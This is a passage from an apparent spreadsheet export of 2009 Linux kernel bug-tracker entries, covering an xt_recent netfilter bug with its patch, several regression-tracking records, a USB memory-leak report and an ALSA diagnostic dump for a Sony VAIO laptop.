packets from 169.254.156.239 are being logged.] $ iptables -I INPUT -s 169.254.156.239 -m recent --set $ cat /proc/net/xt_recent/DEFAULT src=169.254.156.239 ttl: 0 last_seen: 119910 oldest_pkt: 1 119910 src=169.254.156.239 ttl: 255 last_seen: 126184 oldest_pkt: 4 125434, 125684, 125934, 126184 [At this point, adding the address via an iptables rule, packets are being logged correctly.] $ echo -169.254.156.239 &gt; /proc/net/xt_recent/DEFAULT $ cat /proc/net/xt_recent/DEFAULT src=169.254.156.239 ttl: 0 last_seen: 119910 oldest_pkt: 1 119910 src=169.254.156.239 ttl: 255 last_seen: 126992 oldest_pkt: 10 125434, 125684, 125934, 126184, 126434, 126684, 126934, 126991, 126991, 126992 $ echo -169.254.156.239 &gt; /proc/net/xt_recent/DEFAULT $ cat /proc/net/xt_recent/DEFAULT src=169.254.156.239 ttl: 0 last_seen: 119910 oldest_pkt: 1 119910 src=169.254.156.239 ttl: 255 last_seen: 126992 oldest_pkt: 10 125434, 125684, 125934, 126184, 126434, 126684, 126934, 126991, 126991, 126992 [Removing the address via /proc interface failed evidently.] Possible solutions: - initialize the addr variable in recent_mt_proc_write - compare only 4 bytes for IPv4 addresses in recent_entry_lookup Simplest fix: --- linux-2.6.28.7/net/netfilter/xt_recent.c.org 2009-02-22 17:34:19.000000000 +0100 +++ linux-2.6.28.7/net/netfilter/xt_recent.c 2009-02-22 17:34:21.000000000 +0100 @@ -544,7 +544,7 @@ struct recent_entry *e; char buf[sizeof("+b335:1d35:1e55:dead:c0de:1715:5afe:c0de")]; const char *c = buf; - union nf_inet_addr addr; + union nf_inet_addr addr = {}; u_int16_t family; bool add, succ;</t>
  </si>
  <si>
    <t>[BISECT]kernels later than 2.6.26.8 die at cardbus init on laptop</t>
  </si>
  <si>
    <t>2009-02-23 14:32 UTC</t>
  </si>
  <si>
    <t>2010-08-16 18:57 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] &gt;2.6.27 dies at cardbus init on laptop Submitter : David Pflug &lt;dtpflug@gmail.com&gt; Date : 2009-02-17 19:28 References : http://marc.info/?l=linux-kernel&amp;m=123489904218306&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ACPI exception with 2.6.29-rc6</t>
  </si>
  <si>
    <t>2.6.29-rc6</t>
  </si>
  <si>
    <t>2009-02-23 14:34 UTC</t>
  </si>
  <si>
    <t>2009-03-17 10:00 UTC</t>
  </si>
  <si>
    <t>Subject : ACPI exception with 2.6.29-rc6 Submitter : Heinz Diehl &lt;htd@fancy-poultry.org&gt; Date : 2009-02-23 16:46 References : http://marc.info/?l=linux-kernel&amp;m=123540758700861&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.29-rc5 hanging at boot when CONFIG_LOCK_STAT=y</t>
  </si>
  <si>
    <t>2009-02-23 14:53 UTC</t>
  </si>
  <si>
    <t>2009-02-25 15:12 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc5 hanging at boot when CONFIG_LOCK_STAT=y Submitter : "Adam J. Richter" &lt;adam@yggdrasil.com&gt; Date : 2009-02-16 6:50 References : http://marc.info/?l=linux-kernel&amp;m=123476768023893&amp;w=4 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Notify-Also : Peter Zijlstra &lt;peterz@infradead.org&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Bonding tied to IPV6 in 29-rc5</t>
  </si>
  <si>
    <t>2009-02-23 15:04 UTC</t>
  </si>
  <si>
    <t>2009-03-14 13:13 UTC</t>
  </si>
  <si>
    <t>Subject : Bonding tied to IPV6 in 29-rc5 Submitter : "J.A. Magallón" &lt;jamagallon@ono.com&gt; Date : 2009-02-17 8:52 References : http://marc.info/?l=linux-kernel&amp;m=123486078219980&amp;w=4 Handled-By : Brian Haley &lt;brian.haley@hp.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123517631120945&amp;w=4 Notify-Also : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; Notify-Also : Jay Vosburgh &lt;fubar@us.ibm.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Disk errors loop forever in 2.6.29</t>
  </si>
  <si>
    <t>2009-02-23 15:11 UTC</t>
  </si>
  <si>
    <t>2009-03-03 14:14 UTC</t>
  </si>
  <si>
    <t>Subject : [SCSI][REGRESSION][BISECTED] Disk errors loop forever in 2.6.29 Submitter : Sitsofe Wheeler &lt;sitsofe@yahoo.com&gt; Date : 2009-02-19 13:53 References : http://marc.info/?l=linux-kernel&amp;m=123505185407604&amp;w=4 Handled-By : James Bottomley &lt;James.Bottomley@hansenpartnership.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123508030726900&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Can not ioremap virtual address for G33 hw status page</t>
  </si>
  <si>
    <t>2009-02-23 15:28 UTC</t>
  </si>
  <si>
    <t>2009-03-07 14:14 UTC</t>
  </si>
  <si>
    <t>Subject : [Linux 2.6.29-rc6] [drm:i915_set_status_page] *ERROR* can not ioremap virtual address for G33 hw status page Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2009-02-23 14:46 References : http://marc.info/?l=linux-kernel&amp;m=123540053219505&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Caused by: commit 6fb88588555a18792a27f483887fe1f2af5f9c9b Author: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Date: Mon Feb 23 10:08:21 2009 +1000 drm/i915: fix WC mapping in non-GEM i915 code. [airlied - taken from mailing list posting] Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; First-Bad-Commit : 6fb88588555a18792a27f483887fe1f2af5f9c9b Notify-Also : Eric Anholt &lt;eric@anholt.net&gt;</t>
  </si>
  <si>
    <t>i915 VT switch with AIGLX causes X lock up</t>
  </si>
  <si>
    <t>2009-02-23 15:35 UTC</t>
  </si>
  <si>
    <t>2009-07-26 22:44 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] i915 VT switch with AIGLX causes X lock up Submitter : Sitsofe Wheeler &lt;sitsofe@yahoo.com&gt; Date : 2009-02-21 15:38 References : http://marc.info/?l=linux-kernel&amp;m=123523074304955&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Lots of smp_processor_id() in preemptible messages</t>
  </si>
  <si>
    <t>2009-02-23 15:49 UTC</t>
  </si>
  <si>
    <t>2009-02-23 17:41 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.28.7] BUG: using smp_processor_id() in preemptible [00000000] code: pageattr-test/207 Submitter : Tilman Schmidt &lt;t.schmidt@phoenixsoftware.de&gt; Date : 2009-02-23 18:37 References : http://marc.info/?l=linux-kernel&amp;m=123541536414019&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline. Presumably caused by: commit 4f06b0436b2ddbd3b67b10e77098a6862787b3eb Author: Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Date: Wed Feb 11 09:32:19 2009 -0800 x86/cpa: make sure cpa is safe to call in lazy mmu mode Signed-off-by: Jeremy Fitzhardinge &lt;jeremy.fitzhardinge@citrix.com&gt; Acked-by: Marcelo Tosatti &lt;mtosatti@redhat.com&gt; Cc: Stable Kernel &lt;stable@kernel.org&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt;</t>
  </si>
  <si>
    <t>usb_alloc_urb() leaks memory together with uvcvideo driver</t>
  </si>
  <si>
    <t>2009-02-23 22:08 UTC</t>
  </si>
  <si>
    <t>2010-01-25 14:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Hardware Environment: EeePC 901 Software Environment: Debian 5.0 Problem Description: Steps to reproduce: 1. Boot the system 2. start an xterm window and execute the following command: $ while true; do clear; cat /proc/slab_allocators |grep usb_alloc; sleep 1; done This will print out similar lines each second: size-2048: 18 usb_alloc_dev+0x1d/0x212 [usbcore] size-2048: 2280 usb_alloc_urb+0xc/0x2b [usbcore] size-1024: 85 usb_alloc_urb+0xc/0x2b [usbcore] size-128: 10 usb_alloc_urb+0xc/0x2b [usbcore] 3. Start xawtv, this will show the picture of the webcam 4. Exit xawtv Current result: In the output of /proc/slab_allocators the number of blocks allocated by usb_alloc_urb() increases, however, the xawtv is no longer running: size-2048: 18 usb_alloc_dev+0x1d/0x212 [usbcore] size-2048: 2280 usb_alloc_urb+0xc/0x2b [usbcore] size-1024: 100 usb_alloc_urb+0xc/0x2b [usbcore] size-128: 10 usb_alloc_urb+0xc/0x2b [usbcore] Each time xawtv is started and stopped the value increases at the usb_alloc_urb(). Expected result: the same memory usage is reached again after xawtv exited.</t>
  </si>
  <si>
    <t>hda_codec, Unknown model for ALC262, Sony VAIO laptop</t>
  </si>
  <si>
    <t>2009-02-25 13:29 UTC</t>
  </si>
  <si>
    <t>2010-01-19 21:33 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: all Distribution: Debian/sid Hardware Environment: Sony Vaio VGN-Z11 Software Environment: Debian/sid Problem Description: I got an Sony VGN-Z11 laptop which normally gives me hda_codec: Unknown model for ALC262, trying auto-probe from BIOS. and after that all works fine but the muting of the loudspeaker when headphones are plugged in. After some playing now I use model=sony-assamd and the loudspeaker is properly muted when headphones are plugged in. But, using this model now I get hda_intel: azx_get_response timeout, switching to polling mode: last cmd=0x020c0000 and I don't know what else I could/should check. Output of alsa-info.sh from rc2: upload=true&amp;script=true&amp;cardinfo= !!################################ !!ALSA Information Script v 0.4.53 !!################################ !!Script ran on: Mon Jan 26 17:22:16 UTC 2009 !!Linux Distribution !!------------------ Debian GNU/Linux 5.0 \n \l !!Kernel Information !!------------------ Kernel release: 2.6.29-rc2 Operating System: GNU/Linux Architecture: x86_64 Processor: unknown SMP Enabled: Yes !!ALSA Version !!------------ Driver version: 1.0.18a Library version: 1.0.16 Utilities version: 1.0.16 !!Loaded ALSA modules !!------------------- snd_hda_intel !!Sound Servers on this system !!---------------------------- aRts: Installed - Yes (/usr/bin/artsd) Running - No !!Soundcards recognised by ALSA !!----------------------------- 0 [Intel ]: HDA-Intel - HDA Intel HDA Intel at 0xdaa20000 irq 21 !!PCI Soundcards installed in the system !!-------------------------------------- 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 03) !!Advanced information - PCI Vendor/Device/Susbsystem ID's !!-------------------------------------------------------- 00:1b.0 0403: 8086:293e (rev 03) Subsystem: 104d:9025 !!Modprobe options (Sound related) !!-------------------------------- snd-atiixp-modem: index=-2 snd-intel8x0m: index=-2 snd-via82xx-modem: index=-2 snd-pcsp: index=-2 snd-hda-intel: model=sony-assamd !!Loaded sound module options !!-------------------------- !!Module: snd_hda_intel bdl_pos_adj : 1,-1,-1,-1,-1,-1,-1,-1 enable : Y,Y,Y,Y,Y,Y,Y,Y enable_msi : 0 id : &lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt; index : -1,-1,-1,-1,-1,-1,-1,-1 model : sony-assamd,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt;,&lt;NULL&gt; position_fix : 0,0,0,0,0,0,0,0 power_save : 20 power_save_controller : Y probe_mask : -1,-1,-1,-1,-1,-1,-1,-1 probe_only : N,N,N,N,N,N,N,N single_cmd : N !!HDA-Intel Codec information !!--------------------------- --startcollapse-- Codec: Realtek ALC262 Address: 0 Vendor Id: 0x10ec0262 Subsystem Id: 0x104d2f00 Revision Id: 0x100302 No Modem Function Group found Default PCM: rates [0x560]: 44100 48000 96000 192000 bits [0xe]: 16 20 24 formats [0x1]: PCM Default Amp-In caps: N/A Default Amp-Out caps: N/A GPIO: io=4, o=0, i=0, unsolicited=1, wake=0 IO[0]: enable=0, dir=0, wake=0, sticky=0, data=0, unsol=0 IO[1]: enable=0, dir=0, wake=0, sticky=0, data=0, unsol=0 IO[2]: enable=0, dir=0, wake=0, sticky=0, data=0, unsol=0 IO[3]: enable=0, dir=0, wake=0, sticky=0, data=0, unsol=0 Node 0x02 [Audio Output] wcaps 0x411: Stereo Converter: stream=0, channel=0 PCM: rates [0x560]: 44100 48000 96000 192000 bits [0xe]: 16 20 24 formats [0x1]: PCM Power: setting=D0, actual=D0 Node 0x03 [Audio Output] wcaps 0x411: Stereo Converter: stream=0, channel=0 PCM: rates [0x560]: 44100 48000 96000 192000 bits [0xe]: 16 20 24 formats [0x1]: PCM Power: setting=D0, actual=D0 Node 0x04 [Vendor Defined Widget] wcaps 0xf00000: Mono Node 0x05 [Vendor Defined Widget] wcaps 0xf00000: Mono Node 0x06 [Audio Output] wcaps 0x611: Stereo Digital Converter: stream=0, channel=0 Digital: Digital category: 0x0 PCM: rates [0x560]: 44100 48000 96000 192000 bits [0x1e]: 16 20 24 32 formats [0x1]: PCM Power: setting=D0, actual=D0 Node 0x07 [Audio Input] wcaps 0x10051b: Stereo Amp-In Amp-In caps: ofs=0x08, nsteps=0x1f, stepsize=0x05, mute=1 Amp-In vals: [0x00 0x00] Converter: stream=0, channel=0 SDI-Select: 0 PCM: rates [0x560]: 44100 48000 96000 192000 bits [0xe]: 16 20 24 formats [0x1]: PCM Power: setting=D0, actual=D0 Connection: 1 0x24 Node 0x08 [Audio Input] wcaps 0x10051b: Stereo Amp-In Amp-In caps: ofs=0x08, nsteps=0x1f, stepsize=0x05, mute=1 Amp-In vals: [0x00 0x00] Converter: stream=0, channel=0 SDI-Select: 0 PCM: rates [0x560]: 44100 48000 96000 192000 bits [0xe]: 16 20 24 formats [0x1]: PCM Power: setting=D0, actual=D0 Connection: 1 0x23 Node 0x09 [Audio Input] wcaps 0x10051b: Stereo Amp-In Amp-In caps: ofs=0x08, nsteps=0x1f, stepsize=0x05, mute=1 Amp-In vals: [0x00 0x00] Converter: stream=0, channel=0 SDI-Select: 0 PCM: rates [0x560]: 44100 48000 96000 192000 bits [0xe]: 16 20 24 formats [0x1]: PCM Power: setting=D0, actual=D0 Connection: 1 0x22 Node 0x0a [Audio Input] wcaps 0x100791: Stereo Digital Converter: stream=0, channel=0 SDI-Select: 0 Digital: Digital category: 0x0 PCM: rates [0x560]: 44100 48000 96000 192000 bits [0x1e]: 16 20 24 32 formats [0x1]: PCM Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Connection: 1 0x1f Node 0x0b [Audio Mixer] wcaps 0x20010b: Stereo Amp-In Amp-In caps: ofs=0x17, nsteps=0x1f, stepsize=0x05, mute=1 Amp-In vals: [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x81 0x81] [0x81 0x81] [0x81 0x81] Connection: 8 0x18 0x19 0x1a 0x1b 0x1c 0x1d 0x14 0x15 Node 0x0c [Audio Mixer] wcaps 0x20010f: Stereo Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-In vals: [0x00 0x00] [0x00 0x00] Amp-Out caps: ofs=0x1e, nsteps=0x1e, stepsize=0x05, mute=0 Amp-Out vals: [0x0a 0x0a] Connection: 2 0x02 0x0b Node 0x0d [Audio Mixer] wcaps 0x20010f: Stereo Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-In vals: [0x00 0x00] [0x00 0x00] Amp-Out caps: ofs=0x1e, nsteps=0x1e, stepsize=0x05, mute=0 Amp-Out vals: [0x00 0x00] Connection: 2 0x03 0x0b Node 0x0e [Audio Mixer] wcaps 0x20010e: Mono Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-In vals: [0x00] [0x00] Amp-Out caps: ofs=0x1e, nsteps=0x1e, stepsize=0x05, mute=0 Amp-Out vals: [0x00] Connection: 2 0x02 0x0b Node 0x0f [Vendor Defined Widget] wcaps 0xf00000: Mono Node 0x10 [Audio Output] wcaps 0x611: Stereo Digital Converter: stream=0, channel=0 Digital: Digital category: 0x0 PCM: rates [0x560]: 44100 48000 96000 192000 bits [0x1e]: 16 20 24 32 formats [0x1]: PCM Power: setting=D0, actual=D0 Node 0x11 [Pin Complex] wcaps 0x400780: Mono Digital Pincap 0x00000010: OUT Pin Default 0x411111f0: [N/A] Speaker at Ext Rear Conn = 1/8, Color = Black DefAssociation = 0xf, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0x00: Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Connection: 1 0x10 Node 0x12 [Pin Complex] wcaps 0x400401: Stereo Pincap 0x00000020: IN Pin Default 0x90a6012e: [Fixed] Mic at Int N/A Conn = Digital, Color = Unknown DefAssociation = 0x2, Sequence = 0xe Misc = NO_PRESENCE Pin-ctls: 0x00: Power: setting=D0, actual=D0 Node 0x13 [Vendor Defined Widget] wcaps 0xf00000: Mono Node 0x14 [Pin Complex] wcaps 0x40058f: Stereo Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x03, stepsize=0x27, mute=0 Amp-In vals: [0x00 0x00] Amp-Out caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-Out vals: [0x00 0x00] Pincap 0x0000003e: IN OUT HP Detect Trigger Pin Default 0x90170110: [Fixed] Speaker at Int N/A Conn = Analog, Color = Unknown DefAssociation = 0x1, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0xc0: OUT HP Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Connection: 2 0x0c* 0x0d Node 0x15 [Pin Complex] wcaps 0x40058f: Stereo Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x03, stepsize=0x27, mute=0 Amp-In vals: [0x00 0x00] Amp-Out caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-Out vals: [0x00 0x00] Pincap 0x0000003e: IN OUT HP Detect Trigger Pin Default 0x0321101f: [Jack] HP Out at Ext Left Conn = 1/8, Color = Black DefAssociation = 0x1, Sequence = 0xf Pin-ctls: 0xc0: OUT HP Unsolicited: tag=04, enabled=1 Power: setting=D0, actual=D0 Connection: 2 0x0c* 0x0d Node 0x16 [Pin Complex] wcaps 0x40050c: Mono Amp-Out Amp-Out caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-Out vals: [0x80] Pincap 0x00000010: OUT Pin Default 0x411111f0: [N/A] Speaker at Ext Rear Conn = 1/8, Color = Black DefAssociation = 0xf, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0x40: OUT Power: setting=D0, actual=D0 Connection: 1 0x0e Node 0x17 [Vendor Defined Widget] wcaps 0xf00000: Mono Node 0x18 [Pin Complex] wcaps 0x40058f: Stereo Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x03, stepsize=0x27, mute=0 Amp-In vals: [0x00 0x00] Amp-Out caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-Out vals: [0x80 0x80] Pincap 0x0000173e: IN OUT HP Detect Trigger Vref caps: HIZ 50 GRD 80 Pin Default 0x03a11020: [Jack] Mic at Ext Left Conn = 1/8, Color = Black DefAssociation = 0x2, Sequence = 0x0 Pin-ctls: 0x24: IN VREF_80 Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Connection: 2 0x0c* 0x0d Node 0x19 [Pin Complex] wcaps 0x40058f: Stereo Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x03, stepsize=0x27, mute=0 Amp-In vals: [0x00 0x00] Amp-Out caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-Out vals: [0x80 0x80] Pincap 0x0000173e: IN OUT HP Detect Trigger Vref caps: HIZ 50 GRD 80 Pin Default 0x411111f0: [N/A] Speaker at Ext Rear Conn = 1/8, Color = Black DefAssociation = 0xf, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0x24: IN VREF_80 Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Connection: 2 0x0c* 0x0d Node 0x1a [Pin Complex] wcaps 0x40058f: Stereo Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x03, stepsize=0x27, mute=0 Amp-In vals: [0x00 0x00] Amp-Out caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-Out vals: [0x80 0x80] Pincap 0x0000173e: IN OUT HP Detect Trigger Vref caps: HIZ 50 GRD 80 Pin Default 0x411111f0: [N/A] Speaker at Ext Rear Conn = 1/8, Color = Black DefAssociation = 0xf, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0x20: IN VREF_HIZ Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Connection: 2 0x0c* 0x0d Node 0x1b [Pin Complex] wcaps 0x40058f: Stereo Amp-In Amp-Out Amp-In caps: ofs=0x00, nsteps=0x03, stepsize=0x27, mute=0 Amp-In vals: [0x00 0x00] Amp-Out caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-Out vals: [0x80 0x80] Pincap 0x0000173e: IN OUT HP Detect Trigger Vref caps: HIZ 50 GRD 80 Pin Default 0x411111f0: [N/A] Speaker at Ext Rear Conn = 1/8, Color = Black DefAssociation = 0xf, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0x20: IN VREF_HIZ Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Connection: 2 0x0c* 0x0d Node 0x1c [Pin Complex] wcaps 0x400401: Stereo Pincap 0x00000020: IN Pin Default 0x411111f0: [N/A] Speaker at Ext Rear Conn = 1/8, Color = Black DefAssociation = 0xf, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0x20: IN Power: setting=D0, actual=D0 Node 0x1d [Pin Complex] wcaps 0x400400: Mono Pincap 0x00000020: IN Pin Default 0x411111f0: [N/A] Speaker at Ext Rear Conn = 1/8, Color = Black DefAssociation = 0xf, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0x20: IN Power: setting=D0, actual=D0 Node 0x1e [Pin Complex] wcaps 0x400780: Mono Digital Pincap 0x00000010: OUT Pin Default 0x18560030: [Jack] Digital Out at Int HDMI Conn = Digital, Color = Unknown DefAssociation = 0x3, Sequence = 0x0 Pin-ctls: 0x40: OUT Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Connection: 1 0x06 Node 0x1f [Pin Complex] wcaps 0x400680: Mono Digital Pincap 0x00000020: IN Pin Default 0x411111f0: [N/A] Speaker at Ext Rear Conn = 1/8, Color = Black DefAssociation = 0xf, Sequence = 0x0 Misc = NO_PRESENCE Pin-ctls: 0x20: IN Unsolicited: tag=00, enabled=0 Power: setting=D0, actual=D0 Node 0x20 [Vendor Defined Widget] wcaps 0xf00040: Mono Processing caps: benign=0, ncoeff=17 Processing Coefficient: 0x00 Coefficient Index: 0x0c Node 0x21 [Volume Knob Widget] wcaps 0x600080: Mono Volume-Knob: delta=0, steps=32, direct=0, val=0 Unsolicited: tag=00, enabled=0 Connection: 0 Node 0x22 [Audio Selector] wcaps 0x300101: Stereo Connection: 10 0x18* 0x19 0x1a 0x1b 0x1c 0x1d 0x14 0x15 0x0b 0x12 Node 0x23 [Audio Mixer] wcaps 0x20010b: Stereo Amp-In Amp-In caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-In vals: [0x80 0x80] [0x00 0x00] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] Connection: 9 0x18 0x19 0x1a 0x1b 0x1c 0x1d 0x14 0x15 0x0b Node 0x24 [Audio Mixer] wcaps 0x20010b: Stereo Amp-In Amp-In caps: ofs=0x00, nsteps=0x00, stepsize=0x00, mute=1 Amp-In vals: [0x80 0x80] [0x00 0x00] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] [0x80 0x80] Connection: 9 0x18 0x19 0x1a 0x1b 0x1c 0x1d 0x14 0x15 0x0b Codec: Conexant ID 2c06 Address: 1 Vendor Id: 0x14f12c06 Subsystem Id: 0x104d1700 Revision Id: 0x100000 Modem Function Group: 0x2 --endcollapse-- !!ALSA Device nodes !!----------------- crw-rw---- 1 root audio 116, 0 Jan 26 2009 /dev/snd/controlC0 crw-rw---- 1 root audio 116, 4 Jan 26 2009 /dev/snd/hwC0D0 crw-rw---- 1 root audio 116, 5 Jan 26 2009 /dev/snd/hwC0D1 crw-rw---- 1 root audio 116, 24 Jan 26 2009 /dev/snd/pcmC0D0c crw-rw---- 1 root audio 116, 16 Jan 26 18:18 /dev/snd/pcmC0D0p crw-rw---- 1 root audio 116, 1 Jan 26 2009 /dev/snd/seq crw-rw---- 1 root audio 116, 33 Jan 26 2009 /dev/snd/timer !!Aplay/Arecord output !!------------ APLAY **** List of PLAYBACK Hardware Devices **** card 0: Intel [HDA Intel], device 0: ALC262 Analog [ALC262 Analog] Subdevices: 1/1 Subdevice #0: subdevice #0 ARECORD **** List of CAPTURE Hardware Devices **** card 0: Intel [HDA Intel], device 0: ALC262 Analog [ALC262 Analog] Subdevices: 1/1 Subdevice #0: subdevice #0 !!Amixer output !!------------- !!-------Mixer controls for card 0 [Intel] Card hw:0 'Intel'/'HDA Intel at 0xdaa20000 irq 21' Mixer name : 'Realtek ALC262' Components : 'HDA:10ec0262,104d2f00,00100302 HDA:14f12c06,104d1700,00100000' Controls : 17 Simple ctrls : 11 Simple mixer control 'Master',0 Capabilities: pvolume pswitch Playback channels: Front Left - Front Right Limits: Playback 0 - 30 Mono: Front Left: Playback 10 [33%] [-30.00dB] [on] Front Right: Playback 10 [33%] [-30.00dB] [on] Simple mixer control 'PCM',0 Capabilities: pvolume Playback channels: Front Left - Front Right Limits: Playback 0 - 255 Mono: Front Left: Playback 255 [100%] [0.00dB] Front Right: Playback 255 [100%] [0.00dB] Simple mixer control 'Mic',0 Capabilities: pvolume pswitch Playback channels: Front Left - Front Right Limits: Playback 0 - 31 Mono: Front Left: Playback 0 [0%] [-34.50dB] [off] Front Right: Playback 0 [0%] [-34.50dB] [off] Simple mixer control 'Capture',0 Capabilities: cvolume cswitch Capture channels: Front Left - Front Right Limits: Capture 0 - 31 Front Left: Capture 0 [0%] [-12.00dB] [on] Front Right: Capture 0 [0%] [-12.00dB] [on] Simple mixer control 'Capture',1 Capabilities: cvolume cswitch Capture channels: Front Left - Front Right Limits: Capture 0 - 31 Front Left: Capture 0 [0%] [-12.00dB] [on] Front Right: Capture 0 [0%] [-12.00dB] [on] Simple mixer control 'Capture',2 Capabilities: cvolume cswitch Capture channels: Front Left - Front Right Limits: Capture 0 - 31 Front Left: Capture 0 [0%] [-12.00dB] [on] Front Right: Capture 0 [0%] [-12.00dB] [on] Simple mixer control 'ATAPI Mic',0 Capabilities: pvolume pswitch Playback channels: Front Left - Front Right Limits: Playback 0 - 31 Mono: Front Left: Playback 0 [0%] [-34.50dB] [off] Front Right: Playback 0 [0%] [-34.50dB] [off] Simple mixer control 'Digital',0 Capabilities: cvolume Capture channels: Front Left - Front Right Limits: Capture 0 - 120 Front Left: Capture 60 [50%] [0.00dB] Front Right: Capture 60 [50%] [0.00dB] Simple mixer control 'Input Source',0 Capabilities: cenum Items: 'Mic' 'Front Mic' 'Line' 'CD' Item0: 'Front Mic' Simple mixer control 'Input Source',1 Capabilities: cenum Items: 'Mic' 'Front Mic' 'Line' 'CD' Item0: 'Front Mic' Simple mixer control 'Input Source',2 Capabilities: cenum Items: 'Mic' 'Front Mic' 'Line' 'CD' Item0: 'Front Mic' !!Alsactl output !!------------- --startcollapse-- state.Intel { control.1 { comment.access 'read write' comment.type INTEGER comment.count 2 comment.range '0 - 30' comment.dbmin -4500 comment.dbmax 0 iface MIXER name 'Master Playback Volume' value.0 10 value.1 10 } control.2 { comment.access 'read write' comment.type BOOLEAN comment.count 2 iface MIXER name 'Master Playback Switch' value.0 true value.1 true } control.3 { comment.access 'read write' comment.type INTEGER comment.count 2 comment.range '0 - 31' comment.dbmin -3450 comment.dbmax 1200 iface MIXER name 'Mic Playback Volume' value.0 0 value.1 0 } control.4 { comment.access 'read write' comment.type BOOLEAN comment.count 2 iface MIXER name 'Mic Playback Switch' value.0 false value.1 false } control.5 { comment.access 'read write' comment.type INTEGER comment.count 2 comment.range '0 - 31' comment.dbmin -3450 comment.dbmax 1200 iface MIXER name 'ATAPI Mic Playback Volume' value.0 0 value.1 0 } control.6 { comment.access 'read write' comment.type BOOLEAN comment.count 2 iface MIXER name 'ATAPI Mic Playback Switch' value.0 false value.1 false } control.7 { comment.access 'read write' comment.type BOOLEAN comment.count 2 iface MIXER name 'Capture Switch' value.0 true value.1 true } control.8 { comment.access 'read write' comment.type BOOLEAN comment.count 2 iface MIXER name 'Capture Switch' index 1 value.0 true value.1 true } control.9 { comment.access 'read write' comment.type BOOLEAN comment.count 2 iface MIXER name 'Capture Switch' index 2 value.0 true value.1 true } control.10 { comment.access 'read write' comment.type INTEGER comment.count 2 comment.range '0 - 31' comment.dbmin -1200 comment.dbmax 3450 iface MIXER name 'Capture Volume' value.0 0 value.1 0 } control.11 { comment.access 'read write' comment.type INTEGER comment.count 2 comment.range '0 - 31' comment.dbmin -1200 comment.dbmax 